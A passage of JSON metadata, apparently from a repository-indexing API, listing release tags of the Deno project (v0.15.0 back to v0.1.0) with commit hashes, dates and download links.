ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3